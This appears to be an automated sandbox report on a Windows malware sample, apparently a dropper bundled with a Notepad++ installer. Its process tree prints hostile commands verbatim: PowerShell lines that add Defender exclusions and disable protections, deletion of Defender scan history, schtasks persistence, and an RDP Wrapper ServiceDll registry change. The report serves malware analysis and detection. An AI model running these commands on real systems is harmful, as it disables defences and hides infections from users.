21b3ec2a8f16bf7fb571925eda77f05c8c7a32fecd9c43cefba6223c47a80936

Analysis

max time kernel
271s
max time network
293s
platform
windows10-1703_x64
resource
win10-20230703-en
resource tags

arch:x64arch:x86image:win10-20230703-enlocale:en-usos:windows10-1703-x64system
submitted
05-08-2023 23:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

21b3ec2a8f16bf7fb571925eda77f05c8c7a32fecd9c43cefba6223c47a80936.exe
Size

9.4MB
MD5

718d69c7e8baa9b2fea5078ac9adf6b7
SHA1

b409fa7ffde8cc8dbaff27ae6a51d3f599e0ed75
SHA256

21b3ec2a8f16bf7fb571925eda77f05c8c7a32fecd9c43cefba6223c47a80936
SHA512

ece9d1dac93453594fee0df92f8ad9ffa14ba17d4589773eac2c6f5ae1759d4b22e1067813245d2d5ab613d2b7c45173e5aebd1e72c7a720082474b76d403515
SSDEEP

196608:ZeduW/gMzIXjpjzoc1fln3yenGNSZO8WD5UW:jWou0jtzoc1tn3yenG4g8s5UW

Score

8^/10

persistence upx

Malware Config

Signatures

Downloads MZ/PE file

Sets DLL path for service in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "C:\\Program Files\\RDP Wraper\\rdpwrap.dll"	attrib.exe

Executes dropped EXE 4 IoCs

pid	Process
2756	5327dc3f-5e08-43ad-96f6-1fe8fd7909bf.exe
196	Prague.exe.pif
3496	npp.8.4.7.Installer.x64.exe
4708	Fireplace.exe.com

Loads dropped DLL 4 IoCs

pid	Process
3496	npp.8.4.7.Installer.x64.exe
3496	npp.8.4.7.Installer.x64.exe
3496	npp.8.4.7.Installer.x64.exe
3496	npp.8.4.7.Installer.x64.exe

UPX packed file 12 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/3368-570-0x0000000000800000-0x000000000097F000-memory.dmp	upx
behavioral2/memory/3368-572-0x0000000000800000-0x000000000097F000-memory.dmp	upx
behavioral2/memory/3368-573-0x0000000000800000-0x000000000097F000-memory.dmp	upx
behavioral2/memory/2236-672-0x0000000002F50000-0x00000000030CF000-memory.dmp	upx
behavioral2/memory/2236-674-0x0000000002F50000-0x00000000030CF000-memory.dmp	upx
behavioral2/memory/2236-675-0x0000000002F50000-0x00000000030CF000-memory.dmp	upx
behavioral2/memory/3872-769-0x0000000003210000-0x000000000338F000-memory.dmp	upx
behavioral2/memory/3872-771-0x0000000003210000-0x000000000338F000-memory.dmp	upx
behavioral2/memory/3872-772-0x0000000003210000-0x000000000338F000-memory.dmp	upx
behavioral2/memory/2500-858-0x0000000000400000-0x000000000057F000-memory.dmp	upx
behavioral2/memory/2500-860-0x0000000000400000-0x000000000057F000-memory.dmp	upx
behavioral2/memory/2500-861-0x0000000000400000-0x000000000057F000-memory.dmp	upx

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	5327dc3f-5e08-43ad-96f6-1fe8fd7909bf.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 196 set thread context of 3368	196	Prague.exe.pif	88
PID 196 set thread context of 2236	196	Prague.exe.pif	100
PID 196 set thread context of 3872	196	Prague.exe.pif	113
PID 196 set thread context of 2500	196	Prague.exe.pif	127

Drops file in Program Files directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\RDP Wraper\rdpwrap.dll	attrib.exe
File opened for modification	C:\Program Files\RDP Wraper\	attrib.exe
File opened for modification	C:\Program Files\RDP Wraper\rdpwrap.ini	attrib.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
3876	schtasks.exe
5104	schtasks.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4192	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4748	powershell.exe
4748	powershell.exe
4748	powershell.exe
1980	powershell.exe
1980	powershell.exe
1980	powershell.exe
1980	powershell.exe
3108	powershell.exe
3108	powershell.exe
3108	powershell.exe
3108	powershell.exe
196	Prague.exe.pif
196	Prague.exe.pif
196	Prague.exe.pif
196	Prague.exe.pif
196	Prague.exe.pif
196	Prague.exe.pif
196	Prague.exe.pif
196	Prague.exe.pif
196	Prague.exe.pif
196	Prague.exe.pif
196	Prague.exe.pif
196	Prague.exe.pif
196	Prague.exe.pif
196	Prague.exe.pif
196	Prague.exe.pif
196	Prague.exe.pif
196	Prague.exe.pif
196	Prague.exe.pif
196	Prague.exe.pif
196	Prague.exe.pif
196	Prague.exe.pif
196	Prague.exe.pif
196	Prague.exe.pif
196	Prague.exe.pif
1688	powershell.exe
1688	powershell.exe
1688	powershell.exe
3368	attrib.exe
3368	attrib.exe
196	Prague.exe.pif
196	Prague.exe.pif
816	powershell.exe
816	powershell.exe
816	powershell.exe
196	Prague.exe.pif
196	Prague.exe.pif
4708	Fireplace.exe.com
4708	Fireplace.exe.com
4708	Fireplace.exe.com
4708	Fireplace.exe.com
4708	Fireplace.exe.com
4708	Fireplace.exe.com
4708	Fireplace.exe.com
4708	Fireplace.exe.com
4708	Fireplace.exe.com
4708	Fireplace.exe.com
4708	Fireplace.exe.com
4708	Fireplace.exe.com
4708	Fireplace.exe.com
4708	Fireplace.exe.com
2128	powershell.exe
2128	powershell.exe
2128	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4748	powershell.exe
Token: SeDebugPrivilege	1980	powershell.exe
Token: SeDebugPrivilege	3108	powershell.exe
Token: SeDebugPrivilege	1688	powershell.exe
Token: SeIncreaseQuotaPrivilege	1688	powershell.exe
Token: SeSecurityPrivilege	1688	powershell.exe
Token: SeTakeOwnershipPrivilege	1688	powershell.exe
Token: SeLoadDriverPrivilege	1688	powershell.exe
Token: SeSystemProfilePrivilege	1688	powershell.exe
Token: SeSystemtimePrivilege	1688	powershell.exe
Token: SeProfSingleProcessPrivilege	1688	powershell.exe
Token: SeIncBasePriorityPrivilege	1688	powershell.exe
Token: SeCreatePagefilePrivilege	1688	powershell.exe
Token: SeBackupPrivilege	1688	powershell.exe
Token: SeRestorePrivilege	1688	powershell.exe
Token: SeShutdownPrivilege	1688	powershell.exe
Token: SeDebugPrivilege	1688	powershell.exe
Token: SeSystemEnvironmentPrivilege	1688	powershell.exe
Token: SeRemoteShutdownPrivilege	1688	powershell.exe
Token: SeUndockPrivilege	1688	powershell.exe
Token: SeManageVolumePrivilege	1688	powershell.exe
Token: 33	1688	powershell.exe
Token: 34	1688	powershell.exe
Token: 35	1688	powershell.exe
Token: 36	1688	powershell.exe
Token: SeIncreaseQuotaPrivilege	1688	powershell.exe
Token: SeSecurityPrivilege	1688	powershell.exe
Token: SeTakeOwnershipPrivilege	1688	powershell.exe
Token: SeLoadDriverPrivilege	1688	powershell.exe
Token: SeSystemProfilePrivilege	1688	powershell.exe
Token: SeSystemtimePrivilege	1688	powershell.exe
Token: SeProfSingleProcessPrivilege	1688	powershell.exe
Token: SeIncBasePriorityPrivilege	1688	powershell.exe
Token: SeCreatePagefilePrivilege	1688	powershell.exe
Token: SeBackupPrivilege	1688	powershell.exe
Token: SeRestorePrivilege	1688	powershell.exe
Token: SeShutdownPrivilege	1688	powershell.exe
Token: SeDebugPrivilege	1688	powershell.exe
Token: SeSystemEnvironmentPrivilege	1688	powershell.exe
Token: SeRemoteShutdownPrivilege	1688	powershell.exe
Token: SeUndockPrivilege	1688	powershell.exe
Token: SeManageVolumePrivilege	1688	powershell.exe
Token: 33	1688	powershell.exe
Token: 34	1688	powershell.exe
Token: 35	1688	powershell.exe
Token: 36	1688	powershell.exe
Token: SeIncreaseQuotaPrivilege	1688	powershell.exe
Token: SeSecurityPrivilege	1688	powershell.exe
Token: SeTakeOwnershipPrivilege	1688	powershell.exe
Token: SeLoadDriverPrivilege	1688	powershell.exe
Token: SeSystemProfilePrivilege	1688	powershell.exe
Token: SeSystemtimePrivilege	1688	powershell.exe
Token: SeProfSingleProcessPrivilege	1688	powershell.exe
Token: SeIncBasePriorityPrivilege	1688	powershell.exe
Token: SeCreatePagefilePrivilege	1688	powershell.exe
Token: SeBackupPrivilege	1688	powershell.exe
Token: SeRestorePrivilege	1688	powershell.exe
Token: SeShutdownPrivilege	1688	powershell.exe
Token: SeDebugPrivilege	1688	powershell.exe
Token: SeSystemEnvironmentPrivilege	1688	powershell.exe
Token: SeRemoteShutdownPrivilege	1688	powershell.exe
Token: SeUndockPrivilege	1688	powershell.exe
Token: SeManageVolumePrivilege	1688	powershell.exe
Token: 33	1688	powershell.exe

Suspicious use of FindShellTrayWindow 6 IoCs

pid	Process
196	Prague.exe.pif
196	Prague.exe.pif
196	Prague.exe.pif
4708	Fireplace.exe.com
4708	Fireplace.exe.com
4708	Fireplace.exe.com

Suspicious use of SendNotifyMessage 6 IoCs

pid	Process
196	Prague.exe.pif
196	Prague.exe.pif
196	Prague.exe.pif
4708	Fireplace.exe.com
4708	Fireplace.exe.com
4708	Fireplace.exe.com

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3752 wrote to memory of 4748	3752	21b3ec2a8f16bf7fb571925eda77f05c8c7a32fecd9c43cefba6223c47a80936.exe	70
PID 3752 wrote to memory of 4748	3752	21b3ec2a8f16bf7fb571925eda77f05c8c7a32fecd9c43cefba6223c47a80936.exe	70
PID 3752 wrote to memory of 4748	3752	21b3ec2a8f16bf7fb571925eda77f05c8c7a32fecd9c43cefba6223c47a80936.exe	70
PID 3752 wrote to memory of 2756	3752	21b3ec2a8f16bf7fb571925eda77f05c8c7a32fecd9c43cefba6223c47a80936.exe	72
PID 3752 wrote to memory of 2756	3752	21b3ec2a8f16bf7fb571925eda77f05c8c7a32fecd9c43cefba6223c47a80936.exe	72
PID 3752 wrote to memory of 2756	3752	21b3ec2a8f16bf7fb571925eda77f05c8c7a32fecd9c43cefba6223c47a80936.exe	72
PID 2756 wrote to memory of 4308	2756	5327dc3f-5e08-43ad-96f6-1fe8fd7909bf.exe	73
PID 2756 wrote to memory of 4308	2756	5327dc3f-5e08-43ad-96f6-1fe8fd7909bf.exe	73
PID 2756 wrote to memory of 4308	2756	5327dc3f-5e08-43ad-96f6-1fe8fd7909bf.exe	73
PID 2756 wrote to memory of 3028	2756	5327dc3f-5e08-43ad-96f6-1fe8fd7909bf.exe	75
PID 2756 wrote to memory of 3028	2756	5327dc3f-5e08-43ad-96f6-1fe8fd7909bf.exe	75
PID 2756 wrote to memory of 3028	2756	5327dc3f-5e08-43ad-96f6-1fe8fd7909bf.exe	75
PID 3028 wrote to memory of 3228	3028	cmd.exe	77
PID 3028 wrote to memory of 3228	3028	cmd.exe	77
PID 3028 wrote to memory of 3228	3028	cmd.exe	77
PID 3228 wrote to memory of 1980	3228	cmd.exe	78
PID 3228 wrote to memory of 1980	3228	cmd.exe	78
PID 3228 wrote to memory of 1980	3228	cmd.exe	78
PID 3228 wrote to memory of 3108	3228	cmd.exe	79
PID 3228 wrote to memory of 3108	3228	cmd.exe	79
PID 3228 wrote to memory of 3108	3228	cmd.exe	79
PID 3228 wrote to memory of 2988	3228	cmd.exe	80
PID 3228 wrote to memory of 2988	3228	cmd.exe	80
PID 3228 wrote to memory of 2988	3228	cmd.exe	80
PID 3228 wrote to memory of 196	3228	cmd.exe	81
PID 3228 wrote to memory of 196	3228	cmd.exe	81
PID 3228 wrote to memory of 196	3228	cmd.exe	81
PID 3228 wrote to memory of 4192	3228	cmd.exe	82
PID 3228 wrote to memory of 4192	3228	cmd.exe	82
PID 3228 wrote to memory of 4192	3228	cmd.exe	82
PID 196 wrote to memory of 3876	196	Prague.exe.pif	83
PID 196 wrote to memory of 3876	196	Prague.exe.pif	83
PID 196 wrote to memory of 3876	196	Prague.exe.pif	83
PID 196 wrote to memory of 5104	196	Prague.exe.pif	84
PID 196 wrote to memory of 5104	196	Prague.exe.pif	84
PID 196 wrote to memory of 5104	196	Prague.exe.pif	84
PID 3752 wrote to memory of 3496	3752	21b3ec2a8f16bf7fb571925eda77f05c8c7a32fecd9c43cefba6223c47a80936.exe	87
PID 3752 wrote to memory of 3496	3752	21b3ec2a8f16bf7fb571925eda77f05c8c7a32fecd9c43cefba6223c47a80936.exe	87
PID 3752 wrote to memory of 3496	3752	21b3ec2a8f16bf7fb571925eda77f05c8c7a32fecd9c43cefba6223c47a80936.exe	87
PID 196 wrote to memory of 3368	196	Prague.exe.pif	88
PID 196 wrote to memory of 3368	196	Prague.exe.pif	88
PID 196 wrote to memory of 3368	196	Prague.exe.pif	88
PID 196 wrote to memory of 3368	196	Prague.exe.pif	88
PID 196 wrote to memory of 3368	196	Prague.exe.pif	88
PID 3368 wrote to memory of 4272	3368	attrib.exe	90
PID 3368 wrote to memory of 4272	3368	attrib.exe	90
PID 4272 wrote to memory of 1688	4272	cmd.exe	91
PID 4272 wrote to memory of 1688	4272	cmd.exe	91
PID 3368 wrote to memory of 1252	3368	attrib.exe	93
PID 3368 wrote to memory of 1252	3368	attrib.exe	93
PID 3368 wrote to memory of 4316	3368	attrib.exe	94
PID 3368 wrote to memory of 4316	3368	attrib.exe	94
PID 4316 wrote to memory of 1604	4316	cmd.exe	95
PID 4316 wrote to memory of 1604	4316	cmd.exe	95
PID 4316 wrote to memory of 3384	4316	cmd.exe	96
PID 4316 wrote to memory of 3384	4316	cmd.exe	96
PID 3368 wrote to memory of 1288	3368	attrib.exe	97
PID 3368 wrote to memory of 1288	3368	attrib.exe	97
PID 1288 wrote to memory of 1980	1288	cmd.exe	98
PID 1288 wrote to memory of 1980	1288	cmd.exe	98
PID 1980 wrote to memory of 948	1980	net.exe	99
PID 1980 wrote to memory of 948	1980	net.exe	99
PID 196 wrote to memory of 2236	196	Prague.exe.pif	100
PID 196 wrote to memory of 2236	196	Prague.exe.pif	100

Views/modifies file attributes 1 TTPs 4 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2500	attrib.exe
3368	attrib.exe
2236	attrib.exe
3872	attrib.exe

C:\Users\Admin\AppData\Local\Temp\21b3ec2a8f16bf7fb571925eda77f05c8c7a32fecd9c43cefba6223c47a80936.exe
"C:\Users\Admin\AppData\Local\Temp\21b3ec2a8f16bf7fb571925eda77f05c8c7a32fecd9c43cefba6223c47a80936.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3752
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:Temp -ExclusionProcess *.exe -ExclusionExtension exe; Set-MpPreference -SubmitSamplesConsent NeverSend -PUAProtection Disabled
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4748
- C:\Users\Admin\AppData\Local\Temp\5327dc3f-5e08-43ad-96f6-1fe8fd7909bf.exe
  "C:\Users\Admin\AppData\Local\Temp\5327dc3f-5e08-43ad-96f6-1fe8fd7909bf.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:2756
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup dfslkdjfklhjsrhfgauiehruifghai
    3⤵
    PID:4308
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c cmd < 5
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3028
  - - C:\Windows\SysWOW64\cmd.exe
      cmd
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3228
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell get-process avastui
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1980
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell get-process avgui
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3108
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /R "^syXbtyYOvRrtwlrwBarUhdXsBSlrxLhdlLzfzDGmXzfNBcLMWdWSExswiFWkUVxLDNTfQOHXMDWTqlQyibutOcMQzsiOHxFeZEpNCvVoIYu$" 8
        5⤵
        
        PID:2988
    - - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\18076\Prague.exe.pif
        
        18076\\Prague.exe.pif 18076\\m
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of WriteProcessMemory
        
        PID:196
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks.exe /create /tn "Fireplace" /tr "C:\Users\Admin\AppData\Roaming\Norfolk\Fireplace.exe.com C:\Users\Admin\AppData\Roaming\Norfolk\S" /sc onlogon /F /RL HIGHEST
        6⤵
        Creates scheduled task(s)
        
        PID:3876
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks.exe /create /tn "Jacksonville" /tr "C:\Users\Admin\AppData\Roaming\Norfolk\Fireplace.exe.com C:\Users\Admin\AppData\Roaming\Norfolk\S" /sc minute /mo 3 /F /RL HIGHEST
        6⤵
        Creates scheduled task(s)
        
        PID:5104
      - C:\Windows\SysWOW64\attrib.exe
        
        C:\Windows\SysWOW64\attrib.exe
        6⤵
        Sets DLL path for service in the registry
        Drops file in Program Files directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        Views/modifies file attributes
        
        PID:3368
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "powershell -Command Remove-MpPreference -ExclusionPath $env:Temp -ExclusionProcess *.exe -ExclusionExtension exe;Add-MpPreference -ExclusionPath $env:ProgramFiles,$env:Appdata;Add-MpPreference -ExclusionProcess *.com,*.pif;Add-MpPreference -ExclusionExtension com,pif; Set-MpPreference -SubmitSamplesConsent NeverSend; Set-MpPreference -PUAProtection Disabled"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:4272
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Remove-MpPreference -ExclusionPath $env:Temp -ExclusionProcess *.exe -ExclusionExtension exe;Add-MpPreference -ExclusionPath $env:ProgramFiles,$env:Appdata;Add-MpPreference -ExclusionProcess *.com,*.pif;Add-MpPreference -ExclusionExtension com,pif; Set-MpPreference -SubmitSamplesConsent NeverSend; Set-MpPreference -PUAProtection Disabled
        8⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1688
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "del /S /Q "C:\ProgramData\Microsoft\Windows Defender\Scans\History\" > nul"
        7⤵
        
        PID:1252
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "ver | find /v "" > C:\Windows\Temp\f23f"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:4316
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ver "
        8⤵
        
        PID:1604
        
        C:\Windows\system32\find.exe
        
        find /v ""
        8⤵
        
        PID:3384
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "net start TermService /y"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:1288
        
        C:\Windows\system32\net.exe
        
        net start TermService /y
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:1980
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService /y
        9⤵
        
        PID:948
      - C:\Windows\SysWOW64\attrib.exe
        
        C:\Windows\SysWOW64\attrib.exe
        6⤵
        Views/modifies file attributes
        
        PID:2236
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "powershell -Command Remove-MpPreference -ExclusionPath $env:Temp -ExclusionProcess *.exe -ExclusionExtension exe;Add-MpPreference -ExclusionPath $env:ProgramFiles,$env:Appdata;Add-MpPreference -ExclusionProcess *.com,*.pif;Add-MpPreference -ExclusionExtension com,pif; Set-MpPreference -SubmitSamplesConsent NeverSend; Set-MpPreference -PUAProtection Disabled"
        7⤵
        
        PID:4940
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Remove-MpPreference -ExclusionPath $env:Temp -ExclusionProcess *.exe -ExclusionExtension exe;Add-MpPreference -ExclusionPath $env:ProgramFiles,$env:Appdata;Add-MpPreference -ExclusionProcess *.com,*.pif;Add-MpPreference -ExclusionExtension com,pif; Set-MpPreference -SubmitSamplesConsent NeverSend; Set-MpPreference -PUAProtection Disabled
        8⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:816
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "del /S /Q "C:\ProgramData\Microsoft\Windows Defender\Scans\History\" > nul"
        7⤵
        
        PID:4500
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "ver | find /v "" > C:\Windows\Temp\f23f"
        7⤵
        
        PID:2156
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ver "
        8⤵
        
        PID:4844
        
        C:\Windows\system32\find.exe
        
        find /v ""
        8⤵
        
        PID:3348
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "certutil -hashfile "C:\Program Files\RDP Wraper\rdpwrap.dll" MD5 | find /i /v "md5" | find /i /v "certutil" | find /v "" > C:\Windows\Temp\f23f"
        7⤵
        
        PID:4472
        
        C:\Windows\system32\certutil.exe
        
        certutil -hashfile "C:\Program Files\RDP Wraper\rdpwrap.dll" MD5
        8⤵
        
        PID:1916
        
        C:\Windows\system32\find.exe
        
        find /i /v "md5"
        8⤵
        
        PID:2492
        
        C:\Windows\system32\find.exe
        
        find /i /v "certutil"
        8⤵
        
        PID:5088
        
        C:\Windows\system32\find.exe
        
        find /v ""
        8⤵
        
        PID:3516
      - C:\Windows\SysWOW64\attrib.exe
        
        C:\Windows\SysWOW64\attrib.exe
        6⤵
        Views/modifies file attributes
        
        PID:3872
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "powershell -Command Remove-MpPreference -ExclusionPath $env:Temp -ExclusionProcess *.exe -ExclusionExtension exe;Add-MpPreference -ExclusionPath $env:ProgramFiles,$env:Appdata;Add-MpPreference -ExclusionProcess *.com,*.pif;Add-MpPreference -ExclusionExtension com,pif; Set-MpPreference -SubmitSamplesConsent NeverSend; Set-MpPreference -PUAProtection Disabled"
        7⤵
        
        PID:812
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Remove-MpPreference -ExclusionPath $env:Temp -ExclusionProcess *.exe -ExclusionExtension exe;Add-MpPreference -ExclusionPath $env:ProgramFiles,$env:Appdata;Add-MpPreference -ExclusionProcess *.com,*.pif;Add-MpPreference -ExclusionExtension com,pif; Set-MpPreference -SubmitSamplesConsent NeverSend; Set-MpPreference -PUAProtection Disabled
        8⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2128
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "del /S /Q "C:\ProgramData\Microsoft\Windows Defender\Scans\History\" > nul"
        7⤵
        
        PID:1272
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "ver | find /v "" > C:\Windows\Temp\f23f"
        7⤵
        
        PID:4084
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ver "
        8⤵
        
        PID:4156
        
        C:\Windows\system32\find.exe
        
        find /v ""
        8⤵
        
        PID:4088
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "certutil -hashfile "C:\Program Files\RDP Wraper\rdpwrap.dll" MD5 | find /i /v "md5" | find /i /v "certutil" | find /v "" > C:\Windows\Temp\f23f"
        7⤵
        
        PID:3884
        
        C:\Windows\system32\certutil.exe
        
        certutil -hashfile "C:\Program Files\RDP Wraper\rdpwrap.dll" MD5
        8⤵
        
        PID:2832
        
        C:\Windows\system32\find.exe
        
        find /i /v "md5"
        8⤵
        
        PID:3076
        
        C:\Windows\system32\find.exe
        
        find /v ""
        8⤵
        
        PID:4092
        
        C:\Windows\system32\find.exe
        
        find /i /v "certutil"
        8⤵
        
        PID:756
      - C:\Windows\SysWOW64\attrib.exe
        
        C:\Windows\SysWOW64\attrib.exe
        6⤵
        Views/modifies file attributes
        
        PID:2500
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "powershell -Command Remove-MpPreference -ExclusionPath $env:Temp -ExclusionProcess *.exe -ExclusionExtension exe;Add-MpPreference -ExclusionPath $env:ProgramFiles,$env:Appdata;Add-MpPreference -ExclusionProcess *.com,*.pif;Add-MpPreference -ExclusionExtension com,pif; Set-MpPreference -SubmitSamplesConsent NeverSend; Set-MpPreference -PUAProtection Disabled"
        7⤵
        
        PID:2748
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Remove-MpPreference -ExclusionPath $env:Temp -ExclusionProcess *.exe -ExclusionExtension exe;Add-MpPreference -ExclusionPath $env:ProgramFiles,$env:Appdata;Add-MpPreference -ExclusionProcess *.com,*.pif;Add-MpPreference -ExclusionExtension com,pif; Set-MpPreference -SubmitSamplesConsent NeverSend; Set-MpPreference -PUAProtection Disabled
        8⤵
        
        PID:380
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "del /S /Q "C:\ProgramData\Microsoft\Windows Defender\Scans\History\" > nul"
        7⤵
        
        PID:204
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "ver | find /v "" > C:\Windows\Temp\f23f"
        7⤵
        
        PID:4600
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ver "
        8⤵
        
        PID:236
        
        C:\Windows\system32\find.exe
        
        find /v ""
        8⤵
        
        PID:3752
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "certutil -hashfile "C:\Program Files\RDP Wraper\rdpwrap.dll" MD5 | find /i /v "md5" | find /i /v "certutil" | find /v "" > C:\Windows\Temp\f23f"
        7⤵
        
        PID:3860
        
        C:\Windows\system32\certutil.exe
        
        certutil -hashfile "C:\Program Files\RDP Wraper\rdpwrap.dll" MD5
        8⤵
        
        PID:4044
        
        C:\Windows\system32\find.exe
        
        find /i /v "md5"
        8⤵
        
        PID:1332
        
        C:\Windows\system32\find.exe
        
        find /i /v "certutil"
        8⤵
        
        PID:3904
        
        C:\Windows\system32\find.exe
        
        find /v ""
        8⤵
        
        PID:3768
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping localhost -n 18
        5⤵
        Runs ping.exe
        
        PID:4192
- C:\Users\Admin\AppData\Local\Temp\npp.8.4.7.Installer.x64.exe
  "C:\Users\Admin\AppData\Local\Temp\npp.8.4.7.Installer.x64.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:3496

C:\Users\Admin\AppData\Roaming\Norfolk\Fireplace.exe.com
C:\Users\Admin\AppData\Roaming\Norfolk\Fireplace.exe.com C:\Users\Admin\AppData\Roaming\Norfolk\S
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4708

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\RDP Wraper\rdpwrap.dll

Filesize
114KB

MD5
461ade40b800ae80a40985594e1ac236

SHA1
b3892eef846c044a2b0785d54a432b3e93a968c8

SHA256
798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4

SHA512
421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
1KB

MD5
03e3fae96321b5ba63a82e6af43afcde

SHA1
459e3f4e9462a79f4f7874337f09ed15e9071207

SHA256
57ce0af44ea375e626e084b8c04ec9282a91594e2be2273881f4c1af5adfbf42

SHA512
